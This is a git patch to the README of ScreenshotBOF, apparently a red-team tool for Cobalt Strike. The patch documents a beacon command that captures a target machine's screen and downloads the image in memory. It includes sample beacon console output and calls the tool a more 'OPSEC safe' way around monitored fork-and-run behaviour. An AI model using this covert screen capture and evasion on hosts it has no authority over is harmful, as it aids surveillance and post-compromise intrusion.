From 7e0ee92cc4daa15c422860eed7f2e16a47f833dc Mon Sep 17 00:00:00 2001 From: CodeXTF2 Date: Wed, 26 Oct 2022 00:35:38 +0800 Subject: [PATCH] readme --- README.md | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 48d8d90..f868b51 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # ScreenshotBOF -An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory. ## Self Compilation 1. git clone the repo @@ -9,33 +9,25 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does ## Usage 1. import the screenshotBOF.cna script into Cobalt Strike -2. use the command screenshot_bof -3. Download the screenshot from the target +2. use the command screenshot_bof {local filename} ``` -beacon> screenshot_bof +beacon> screenshot_bof sad.bmp [*] Running screenshot BOF by (@codex_tf2) -[+] host called home, sent: 3411 bytes +[+] host called home, sent: 4860 bytes [+] received output: -[*] Tasked beacon to printscreen and save to disk +[*] Tasked beacon to printscreen and save to sad.bmp [+] received output: [+] PrintScreen saved to bitmap... -[+] received output: -[+] Printscreen bitmap saved to screenshot.bmp -beacon> download screenshot.bmp -[*] Tasked beacon to download screenshot.bmp -[+] host called home, sent: 22 bytes -[*] started download of C:\screenshot.bmp (12441668 bytes) -[*] download of screenshot.bmp is complete +[*] started download of sad.bmp ``` ## Notes - no evasion is performed, which should be fine since the WinAPIs used are not malicious -- in memory downloading of screenshots is planned to be added -- the filename can be changed in the source code. ## Why did I make this? Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability. ## Credits - Made using https://github.com/securifybv/Visual-Studio-BOF-template -- Save BMP to file from https://stackoverflow.com/a/60667564 \ No newline at end of file +- Save BMP to file from https://stackoverflow.com/a/60667564 +- in memory download from https://github.com/anthemtotheego/CredBandit \ No newline at end of file